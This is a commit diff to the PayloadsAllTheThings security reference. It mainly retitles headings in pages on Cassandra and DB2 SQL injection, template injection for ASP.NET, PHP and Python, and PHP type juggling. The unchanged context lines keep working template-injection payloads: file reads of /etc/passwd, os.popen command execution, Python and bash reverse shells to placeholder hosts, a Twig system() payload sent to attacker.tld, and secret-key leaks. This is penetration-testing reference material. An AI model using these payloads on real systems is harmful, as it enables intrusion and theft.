XPATH + XSS + XXE + XSLT

Author: swisskyrepo

SQL Injection/Cassandra Injection.md

@@ -6,8 +6,8 @@
 ## Summary
 
 * [CQL Injection Limitations](#cql-injection-limitations)
-* [Cassandra comment](#cassandra-comment)
-* [Cassandra - Login Bypass](#cassandra---login-bypass)
+* [Cassandra Comment](#cassandra-comment)
+* [Cassandra Login Bypass](#cassandra-login-bypass)
     * [Example #1](#example-1)
     * [Example #2](#example-2)
 * [References](#references) 
@@ -26,14 +26,14 @@
 * CQL does not allow subqueries or other nested statements, so a query like `SELECT * FROM table WHERE column=(SELECT column FROM table LIMIT 1);` would be rejected. 
 
 
-## Cassandra comment
+## Cassandra Comment
 
 ```sql
 /* Cassandra Comment */
 ```
 
 
-## Cassandra - Login Bypass
+## Cassandra Login Bypass
 
 ### Example #1
 

SQL Injection/DB2 Injection.md

@@ -54,7 +54,6 @@
 
 ## DB2 Methodology
 
-
 | Description      | SQL Query |
 | ---------------- | ------------------------------------ |
 | List databases   | `SELECT distinct(table_catalog) FROM sysibm.tables` |

Server Side Template Injection/ASP.md

@@ -6,8 +6,8 @@
 ## Summary
 
 - [ASP.NET Razor](#aspnet-razor)
-    - [ASP.NET Razor - Basic injection](#aspnet-razor---basic-injection)
-    - [ASP.NET Razor - Command execution](#aspnet-razor---command-execution)
+    - [ASP.NET Razor - Basic Injection](#aspnet-razor---basic-injection)
+    - [ASP.NET Razor - Command Execution](#aspnet-razor---command-execution)
 - [References](#references)
 
 
@@ -18,13 +18,13 @@
 > Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages.
 
 
-### ASP.NET Razor - Basic injection
+### ASP.NET Razor - Basic Injection
 
 ```powershell
 @(1+2)
 ```
 
-### ASP.NET Razor - Command execution
+### ASP.NET Razor - Command Execution
 
 ```csharp
 @{

Server Side Template Injection/PHP.md

@@ -8,13 +8,13 @@
 - [Templating Libraries](#templating-libraries)
 - [Smarty](#smarty)
 - [Twig](#twig)
-    - [Twig - Basic injection](#twig---basic-injection)
-    - [Twig - Template format](#twig---template-format)
+    - [Twig - Basic Injection](#twig---basic-injection)
+    - [Twig - Template Format](#twig---template-format)
     - [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading)
-    - [Twig - Code execution](#twig---code-execution)
+    - [Twig - Code Execution](#twig---code-execution)
 - [Latte](#latte)
-    - [Latte - Basic injection](#latte---basic-injection)
-    - [Latte - Code execution](#latte---code-execution)
+    - [Latte - Basic Injection](#latte---basic-injection)
+    - [Latte - Code Execution](#latte---code-execution)
 - [patTemplate](#pattemplate)
 - [PHPlib](#phplib-and-html_template_phplib)
 - [Plates](#plates)
@@ -53,7 +53,7 @@
 [Official website](https://twig.symfony.com/)
 > Twig is a modern template engine for PHP.
 
-### Twig - Basic injection
+### Twig - Basic Injection
 
 ```python
 {{7*7}}
@@ -63,7 +63,7 @@
 {{app.request.server.all|join(',')}}
 ```
 
-### Twig - Template format
+### Twig - Template Format
 
 ```python
 $output = $twig > render (
@@ -84,7 +84,7 @@ $output = $twig > render (
 {{include("wp-config.php")}}
 ```
 
-### Twig - Code execution
+### Twig - Code Execution
 
 ```python
 {{self}}
@@ -118,13 +118,13 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld
 
 ## Latte
 
-### Latte - Basic injection
+### Latte - Basic Injection
 
 ```php
 {var $X="POC"}{$X}
 ```
 
-### Latte - Code execution
+### Latte - Code Execution
 
 ```php
 {php system('nslookup oastify.com')}

Server Side Template Injection/Python.md

@@ -7,29 +7,29 @@
 
 - [Templating Libraries](#templating-libraries)
 - [Django](#django)
-    - [Django - Basic injection](#django---basic-injection)
-    - [Django - Cross-site scripting](#django---cross-site-scripting)
-    - [Django - Debug information leak](#django---debug-information-leak)
-    - [Django - Leaking app's Secret Key](#django---leaking-apps-secret-key)
+    - [Django - Basic Injection](#django---basic-injection)
+    - [Django - Cross-Site Scripting](#django---cross-site-scripting)
+    - [Django - Debug Information Leak](#django---debug-information-leak)
+    - [Django - Leaking App's Secret Key](#django---leaking-apps-secret-key)
     - [Django - Admin Site URL leak](#django---admin-site-url-leak)
-    - [Django - Admin username and password hash leak](#django---admin-username-and-password-hash-leak)
+    - [Django - Admin Username and Password Hash Leak](#django---admin-username-and-password-hash-leak)
 - [Jinja2](#jinja2)
-    - [Jinja2 - Basic injection](#jinja2---basic-injection)
-    - [Jinja2 - Template format](#jinja2---template-format)
+    - [Jinja2 - Basic Injection](#jinja2---basic-injection)
+    - [Jinja2 - Template Format](#jinja2---template-format)
     - [Jinja2 - Debug Statement](#jinja2---debug-statement)
-    - [Jinja2 - Dump all used classes](#jinja2---dump-all-used-classes)
-    - [Jinja2 - Dump all config variables](#jinja2---dump-all-config-variables)
-    - [Jinja2 - Read remote file](#jinja2---read-remote-file)
-    - [Jinja2 - Write into remote file](#jinja2---write-into-remote-file)
+    - [Jinja2 - Dump All Used Classes](#jinja2---dump-all-used-classes)
+    - [Jinja2 - Dump All Config Variables](#jinja2---dump-all-config-variables)
+    - [Jinja2 - Read Remote File](#jinja2---read-remote-file)
+    - [Jinja2 - Write Into Remote File](#jinja2---write-into-remote-file)
     - [Jinja2 - Remote Command Execution](#jinja2---remote-command-execution)
-        - [Forcing output on blind RCE](#jinja2---forcing-output-on-blind-rce)
-        - [Exploit the SSTI by calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread)
-        - [Exploit the SSTI by calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen)
-        - [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset)
-        - [Exploit the SSTI by writing an evil config file.](#exploit-the-ssti-by-writing-an-evil-config-file)
-    - [Jinja2 - Filter bypass](#jinja2---filter-bypass)
+        - [Forcing Output On Blind RCE](#jinja2---forcing-output-on-blind-rce)
+        - [Exploit The SSTI By Calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread)
+        - [Exploit The SSTI By Calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen)
+        - [Exploit The SSTI By Calling Popen Without Guessing The Offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset)
+        - [Exploit The SSTI By Writing an Evil Config File](#exploit-the-ssti-by-writing-an-evil-config-file)
+    - [Jinja2 - Filter Bypass](#jinja2---filter-bypass)
 - [Tornado](#tornado)
-    - [Tornado - Basic injection](#tornado---basic-injection)
+    - [Tornado - Basic Injection](#tornado---basic-injection)
     - [Tornado - Remote Command Execution](#tornado---remote-command-execution)    
 - [Mako](#mako)
     - [Mako - Remote Command Execution](#mako---remote-command-execution)
@@ -54,7 +54,7 @@
 
 Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2.
 
-### Django - Basic injection
+### Django - Basic Injection
 
 ```python
 {% csrf_token %} # Causes error with Jinja2
@@ -63,20 +63,20 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
 ```
 
 
-### Django - Cross-site scripting
+### Django - Cross-Site Scripting
 
 ```python
 {{ '<script>alert(3)</script>' }}
 {{ '<script>alert(3)</script>' | safe }}
 ```
 
-### Django - Debug information leak
+### Django - Debug Information Leak
 
 ```python
 {% debug %}
 ```
 
-### Django - Leaking app’s Secret Key
+### Django - Leaking App's Secret Key
 
 ```python
 {{ messages.storages.0.signer.key }}
@@ -89,7 +89,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
 {% include 'admin/base.html' %}
 ```
 
-### Django - Admin username and password hash leak
+### Django - Admin Username And Password Hash Leak
 
 
 ```
@@ -104,7 +104,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
 [Official website](https://jinja.palletsprojects.com/)
 > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.  
 
-### Jinja2 - Basic injection
+### Jinja2 - Basic Injection
 
 ```python
 {{4*4}}[[5*5]]
@@ -115,7 +115,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
 Jinja2 is used by Python Web Frameworks such as Django or Flask.
 The above injections have been tested on a Flask application.
 
-### Jinja2 - Template format
+### Jinja2 - Template Format
 
 ```python
 {% extends "layout.html" %}
@@ -139,7 +139,7 @@ If the Debug Extension is enabled, a `{% debug %}` tag will be available to dump
 
 Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement
 
-### Jinja2 - Dump all used classes
+### Jinja2 - Dump All Used Classes
 
 ```python
 {{ [].class.base.subclasses() }}
@@ -153,7 +153,7 @@ Access `__globals__` and `__builtins__`:
 {{ self.__init__.__globals__.__builtins__ }}
 ```
 
-### Jinja2 - Dump all config variables
+### Jinja2 - Dump All Config Variables
 
 ```python
 {% for key, value in config.iteritems() %}
@@ -162,7 +162,7 @@ Access `__globals__` and `__builtins__`:
 {% endfor %}
 ```
 
-### Jinja2 - Read remote file
+### Jinja2 - Read Remote File
 
 ```python
 # ''.__class__.__mro__[2].__subclasses__()[40] = File class
@@ -172,7 +172,7 @@ Access `__globals__` and `__builtins__`:
 {{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
 ```
 
-### Jinja2 - Write into remote file
+### Jinja2 - Write Into Remote File
 
 ```python
 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
@@ -186,7 +186,7 @@ Listen for connection
 nc -lnvp 8000
 ```
 
-#### Jinja2 - Forcing output on blind RCE
+#### Jinja2 - Forcing Output On Blind RCE
 
 You can import Flask functions to return an output from the vulnerable page.
 
@@ -203,7 +203,7 @@ def hook(*args, **kwargs):
 ```
 
 
-#### Exploit the SSTI by calling os.popen().read()
+#### Exploit The SSTI By Calling os.popen().read()
 
 ```python
 {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
@@ -235,7 +235,7 @@ With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a pa
 
 Source: https://twitter.com/podalirius_/status/1655970628648697860
 
-#### Exploit the SSTI by calling subprocess.Popen
+#### Exploit The SSTI By Calling subprocess.Popen
 
 :warning: the number 396 will vary depending of the application.
 
@@ -244,7 +244,7 @@ Source: https://twitter.com/podalirius_/status/1655970628648697860
 {{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
 ```
 
-#### Exploit the SSTI by calling Popen without guessing the offset
+#### Exploit The SSTI By Calling Popen Without Guessing The Offset
 
 ```python
 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
@@ -257,7 +257,7 @@ In another GET parameter include a variable named "input" that contains the comm
 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
 ```
 
-#### Exploit the SSTI by writing an evil config file.
+#### Exploit The SSTI By Writing An Evil Config File
 
 ```python
 # evil config
@@ -270,7 +270,7 @@ In another GET parameter include a variable named "input" that contains the comm
 {{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
 ```
 
-### Jinja2 - Filter bypass
+### Jinja2 - Filter Bypass
 
 ```python
 request.__class__
@@ -313,7 +313,7 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http
 
 ## Tornado
 
-### Tornado - Basic injection
+### Tornado - Basic Injection
 
 ```py
 {{7*7}}

Type Juggling/README.md

@@ -6,8 +6,8 @@
 ## Summary
 
 * [Loose Comparison](#loose-comparison)
-	* [True statements](#true-statements)
-	* [NULL statements](#null-statements)
+	* [True Statements](#true-statements)
+	* [NULL Statements](#null-statements)
 	* [Loose Comparison](#loose-comparison)
 * [Magic Hashes](#magic-hashes)
 * [Methodology](#methodology)
@@ -22,7 +22,7 @@
 - **Loose** comparison: using `== or !=` : both variables have "the same value".
 - **Strict** comparison: using `=== or !==` : both variables have "the same type and the same value".
 
-### True statements
+### True Statements
 
 | Statement                         | Output |
 | --------------------------------- |:---------------:|
@@ -44,7 +44,7 @@
 
 ![LooseTypeComparison](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/Images/table_representing_behavior_of_PHP_with_loose_type_comparisons.png?raw=true)
 
-Loose Type Comparisons occurs in many languages:
+Loose Type comparisons occurs in many languages:
 
 * [MariaDB](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mariadb)
 * [MySQL](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mysql)
@@ -56,7 +56,7 @@ Loose Type Comparisons occurs in many languages:
 * [SQLite](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/SQLite/2.6.0)
 
 
-### NULL statements
+### NULL Statements
 
 | Function | Statement                  | Output |
 | -------- | -------------------------- |:---------------:|